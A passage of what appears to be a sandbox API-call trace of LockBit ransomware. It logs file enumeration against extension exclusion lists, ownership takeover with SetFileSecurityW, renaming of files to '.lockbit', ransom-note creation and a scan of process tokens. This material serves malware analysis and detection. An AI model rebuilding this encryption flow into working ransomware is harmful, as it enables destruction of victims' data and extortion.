-1 [0098.022] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0098.022] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0098.022] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0098.022] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0098.022] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0098.022] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0098.022] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0098.022] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0098.022] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0098.022] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0098.022] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0098.022] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0098.022] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0098.022] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0098.022] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0098.022] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0098.022] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0098.022] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0098.022] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0098.023] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0098.023] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0098.023] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0098.023] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0098.023] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0098.023] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0098.023] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0098.023] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0098.023] wsprintfW (in: param_1=0x344d620, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0098.023] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="ipshrv.xml") returned 1 [0098.023] lstrcmpiW (lpString1="ntldr", lpString2="ipshrv.xml") returned 1 [0098.023] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="ipshrv.xml") returned 1 [0098.023] lstrcmpiW (lpString1="bootsect.bak", lpString2="ipshrv.xml") returned -1 [0098.023] lstrcmpiW (lpString1="autorun.inf", lpString2="ipshrv.xml") returned -1 [0098.023] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\") returned="" [0098.023] PathFindExtensionW (pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml") returned=".xml" [0098.023] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0098.023] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0098.023] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0098.023] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0098.023] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0098.023] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0098.024] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0098.024] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0098.024] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0098.024] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0098.024] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0098.024] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0098.024] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0098.024] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0098.024] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0098.024] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0098.024] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0098.024] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0098.024] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0098.024] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0098.024] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0098.024] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0098.024] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0098.024] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0098.024] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0098.024] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0098.024] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0098.024] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0098.024] wsprintfW (in: param_1=0x344cdc0, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml.lockbit") returned 70 [0098.025] lstrcmpiW (lpString1=".xml", lpString2=".lockbit") returned 1 [0098.025] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipshrv.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipshrv.xml.lockbit")) returned 0 [0098.025] GetLastError () returned 0x5 [0098.029] GetProcAddress (hModule=0x77150000, lpProcName="RtlFreeUnicodeString") returned 0x7717e126 [0098.030] GetProcAddress (hModule=0x77150000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77191660 [0098.030] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0098.032] GetProcAddress (hModule=0x77150000, lpProcName="NtOpenFile") returned 0x7716fd54 [0098.034] GetProcAddress (hModule=0x77150000, lpProcName="NtClose") returned 0x7716f9d0 [0098.034] NtOpenFile (in: FileHandle=0x344cd68, DesiredAccess=0x80, ObjectAttributes=0x344cc18*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipshrv.xml"), Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x344cc10, ShareAccess=0x7, OpenOptions=0x0 | out: FileHandle=0x344cd68*=0xf20, IoStatusBlock=0x344cc10*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0098.035] GetProcAddress (hModule=0x77150000, lpProcName="NtQueryInformationFile") returned 0x7716fa00 [0098.035] NtQueryInformationFile (in: FileHandle=0xf20, IoStatusBlock=0x344cc30, FileInformation=0x344caf0, Length=0x110, FileInformationClass=0x2f | out: IoStatusBlock=0x344cc30, FileInformation=0x344caf0) returned 0x0 [0098.213] NtClose (Handle=0xf20) returned 0x0 [0098.213] RtlFreeAnsiString (AnsiString="\\") [0098.213] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x344cda4 | out: TokenHandle=0x344cda4*=0xf20) returned 1 [0098.213] malloc (_Size=0x200) returned 0x3980cc0 [0098.213] GetTokenInformation (in: TokenHandle=0xf20, TokenInformationClass=0x1, TokenInformation=0x3980cc0, TokenInformationLength=0x200, ReturnLength=0x344cda0 | out: TokenInformation=0x3980cc0, ReturnLength=0x344cda0) returned 1 [0098.213] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x344cd88, dwRevision=0x1 | out: pSecurityDescriptor=0x344cd88) returned 1 [0098.213] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x344cd88, pOwner=0x3980cc8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x344cd88) returned 1 [0098.213] CloseHandle (hObject=0xf20) returned 1 [0098.213] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml", SecurityInformation=0x1, pSecurityDescriptor=0x344cd88) returned 1 [0098.214] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml", SecurityInformation=0x4, pSecurityDescriptor=0x344cd88) returned 1 [0098.214] free (_Block=0x3980cc0) [0098.214] lstrcmpiW (lpString1=".xml", lpString2=".lockbit") returned 1 [0098.214] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipshrv.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipshrv.xml.lockbit")) returned 1 [0098.215] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipshrv.xml.lockbit"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xf20 [0098.215] CreateIoCompletionPort (FileHandle=0xf20, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0098.215] malloc (_Size=0x40068) returned 0x3940048 [0098.215] GetFileSizeEx (in: hFile=0xf20, lpFileSize=0x3940060 | out: lpFileSize=0x3940060*=2652) returned 1 [0098.215] ReadFile (in: hFile=0xf20, lpBuffer=0x394007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3940048 | out: lpBuffer=0x394007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3940048) returned 0x0 [0098.219] GetLastError () returned 0x3e5 [0098.219] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink") returned 1 [0098.219] wsprintfW (in: param_1=0x344cb78, param_2="%s%S" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\Restore-My-Files.txt") returned 72 [0098.220] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\Restore-My-Files.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0098.220] FindNextFileW (in: hFindFile=0x2e3250, lpFindFileData=0x344d6e8 | out: lpFindFileData=0x344d6e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27ce22e5, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27ce22e5, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x9de, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="ipsita.xml", cAlternateFileName="")) returned 1 [0098.220] lstrcmpiW (lpString1=".", lpString2="ipsita.xml") returned -1 [0098.220] lstrcmpiW (lpString1="..", lpString2="ipsita.xml") returned -1 [0098.220] PathFindExtensionW (pszPath="ipsita.xml") returned=".xml" [0098.220] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0098.220] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0098.220] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0098.220] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0098.220] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0098.220] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0098.220] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0098.220] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0098.220] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0098.220] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0098.220] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0098.220] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0098.220] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0098.220] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0098.220] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0098.220] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0098.220] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0098.220] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0098.220] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0098.220] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0098.220] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0098.220] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0098.220] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0098.221] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0098.221] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0098.221] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0098.221] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0098.221] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0098.221] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0098.221] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0098.221] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0098.221] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0098.221] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0098.221] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0098.221] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0098.221] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0098.221] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0098.221] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0098.221] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0098.221] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0098.221] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0098.221] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0098.221] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0098.221] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0098.221] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0098.221] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0098.221] wsprintfW (in: param_1=0x344d620, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0098.221] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="ipsita.xml") returned 1 [0098.221] lstrcmpiW (lpString1="ntldr", lpString2="ipsita.xml") returned 1 [0098.221] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="ipsita.xml") returned 1 [0098.221] lstrcmpiW (lpString1="bootsect.bak", lpString2="ipsita.xml") returned -1 [0098.221] lstrcmpiW (lpString1="autorun.inf", lpString2="ipsita.xml") returned -1 [0098.221] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\") returned="" [0098.222] PathFindExtensionW (pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml") returned=".xml" [0098.222] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0098.222] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0098.222] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0098.222] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0098.222] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0098.222] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0098.222] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0098.222] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0098.222] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0098.222] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0098.222] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0098.222] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0098.222] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0098.222] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0098.222] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0098.222] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0098.222] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0098.222] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0098.222] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0098.222] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0098.222] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0098.222] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0098.222] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0098.222] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0098.222] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0098.222] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0098.222] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0098.222] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0098.222] wsprintfW (in: param_1=0x344cdc0, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml.lockbit") returned 70 [0098.223] lstrcmpiW (lpString1=".xml", lpString2=".lockbit") returned 1 [0098.223] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsita.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsita.xml.lockbit")) returned 0 [0098.223] GetLastError () returned 0x5 [0098.227] GetProcAddress (hModule=0x77150000, lpProcName="RtlFreeUnicodeString") returned 0x7717e126 [0098.228] GetProcAddress (hModule=0x77150000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77191660 [0098.228] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0098.230] GetProcAddress (hModule=0x77150000, lpProcName="NtOpenFile") returned 0x7716fd54 [0098.231] GetProcAddress (hModule=0x77150000, lpProcName="NtClose") returned 0x7716f9d0 [0098.231] NtOpenFile (in: FileHandle=0x344cd68, DesiredAccess=0x80, ObjectAttributes=0x344cc18*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsita.xml"), Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x344cc10, ShareAccess=0x7, OpenOptions=0x0 | out: FileHandle=0x344cd68*=0x1180, IoStatusBlock=0x344cc10*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0098.233] GetProcAddress (hModule=0x77150000, lpProcName="NtQueryInformationFile") returned 0x7716fa00 [0098.233] NtQueryInformationFile (in: FileHandle=0x1180, IoStatusBlock=0x344cc30, FileInformation=0x344caf0, Length=0x110, FileInformationClass=0x2f | out: IoStatusBlock=0x344cc30, FileInformation=0x344caf0) returned 0x0 [0098.239] NtClose (Handle=0x1180) returned 0x0 [0098.240] RtlFreeAnsiString (AnsiString="\\") [0098.240] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x344cda4 | out: TokenHandle=0x344cda4*=0x1180) returned 1 [0098.240] malloc (_Size=0x200) returned 0x3980cc0 [0098.240] GetTokenInformation (in: TokenHandle=0x1180, TokenInformationClass=0x1, TokenInformation=0x3980cc0, TokenInformationLength=0x200, ReturnLength=0x344cda0 | out: TokenInformation=0x3980cc0, ReturnLength=0x344cda0) returned 1 [0098.240] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x344cd88, dwRevision=0x1 | out: pSecurityDescriptor=0x344cd88) returned 1 [0098.240] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x344cd88, pOwner=0x3980cc8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x344cd88) returned 1 [0098.240] CloseHandle (hObject=0x1180) returned 1 [0098.240] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml", SecurityInformation=0x1, pSecurityDescriptor=0x344cd88) returned 1 [0098.240] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml", SecurityInformation=0x4, pSecurityDescriptor=0x344cd88) returned 1 [0098.240] free (_Block=0x3980cc0) [0098.240] lstrcmpiW (lpString1=".xml", lpString2=".lockbit") returned 1 [0098.241] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsita.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsita.xml.lockbit")) returned 1 [0098.241] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsita.xml.lockbit"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x1180 [0098.242] CreateIoCompletionPort (FileHandle=0x1180, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0098.242] malloc (_Size=0x40068) returned 0x20acee8 [0098.242] GetFileSizeEx (in: hFile=0x1180, lpFileSize=0x20acf00 | out: lpFileSize=0x20acf00*=2526) returned 1 [0098.242] ReadFile (in: hFile=0x1180, lpBuffer=0x20acf1c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x20acee8 | out: lpBuffer=0x20acf1c, lpNumberOfBytesRead=0x0, lpOverlapped=0x20acee8) returned 0x0 [0098.244] GetLastError () returned 0x3e5 [0098.244] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink") returned 1 [0098.244] wsprintfW (in: param_1=0x344cb78, param_2="%s%S" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\Restore-My-Files.txt") returned 72 [0098.244] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\Restore-My-Files.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0098.244] FindNextFileW (in: hFindFile=0x2e3250, lpFindFileData=0x344d6e8 | out: lpFindFileData=0x344d6e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27d08442, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27d08442, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x9188b373, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x9da, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="ipsjpn.xml", cAlternateFileName="")) returned 1 [0098.244] lstrcmpiW (lpString1=".", lpString2="ipsjpn.xml") returned -1 [0098.244] lstrcmpiW (lpString1="..", lpString2="ipsjpn.xml") Thread: id = 19 os_tid = 0xfc0 Thread: id = 20 os_tid = 0xfc4 Thread: id = 21 os_tid = 0xfc8 [0075.800] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x393ff48 | out: TokenHandle=0x393ff48*=0x288) returned 1 [0075.800] GetTokenInformation (in: TokenHandle=0x288, TokenInformationClass=0x12, TokenInformation=0x393ff44, TokenInformationLength=0x4, ReturnLength=0x393ff4c | out: TokenInformation=0x393ff44, ReturnLength=0x393ff4c) returned 1 [0075.800] GetTokenInformation (in: TokenHandle=0x288, TokenInformationClass=0x13, TokenInformation=0x393ff44, TokenInformationLength=0x4, ReturnLength=0x393ff4c | out: TokenInformation=0x393ff44, ReturnLength=0x393ff4c) returned 1 [0075.800] GetTokenInformation (in: TokenHandle=0x388, TokenInformationClass=0xa, TokenInformation=0x393ff50, TokenInformationLength=0x38, ReturnLength=0x393ff4c | out: TokenInformation=0x393ff50, ReturnLength=0x393ff4c) returned 1 [0075.800] CloseHandle (hObject=0x388) returned 1 [0075.800] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x388 [0075.816] Process32FirstW (in: hSnapshot=0x388, lppe=0x393fcb0 | out: lppe=0x393fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0075.818] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0075.818] Process32NextW (in: hSnapshot=0x388, lppe=0x393fcb0 | out: lppe=0x393fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0075.819] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x4) returned 0x2d0 [0075.819] OpenProcessToken (in: ProcessHandle=0x2d0, DesiredAccess=0xa, TokenHandle=0x393ff2c | out: TokenHandle=0x393ff2c*=0x0) returned 0 [0075.819] CloseHandle (hObject=0x2d0) returned 1 [0075.819] Process32NextW (in: hSnapshot=0x388, lppe=0x393fcb0 | out: lppe=0x393fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0075.820] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x104) returned 0x2d0 [0075.820] OpenProcessToken (in: ProcessHandle=0x2d0, DesiredAccess=0xa, TokenHandle=0x393ff2c | out: TokenHandle=0x393ff2c*=0x38c) returned 1 [0075.820] GetTokenInformation (in: TokenHandle=0x38c, TokenInformationClass=0xa, TokenInformation=0x393fee0, TokenInformationLength=0x38, ReturnLength=0x393ff1c | out: TokenInformation=0x393fee0, ReturnLength=0x393ff1c) returned 1 [0075.820] CloseHandle (hObject=0x38c) returned 1 [0075.821] CloseHandle (hObject=0x2d0) returned 1 [0075.821] Process32NextW (in: hSnapshot=0x388, lppe=0x393fcb0 | out: lppe=0x393fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0075.822] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x148) returned 0x2d0 [0075.822] OpenProcessToken (in: ProcessHandle=0x2d0, DesiredAccess=0xa, TokenHandle=0x393ff2c | out: TokenHandle=0x393ff2c*=0x38c) returned 1 [0075.822] GetTokenInformation (in: TokenHandle=0x38c, 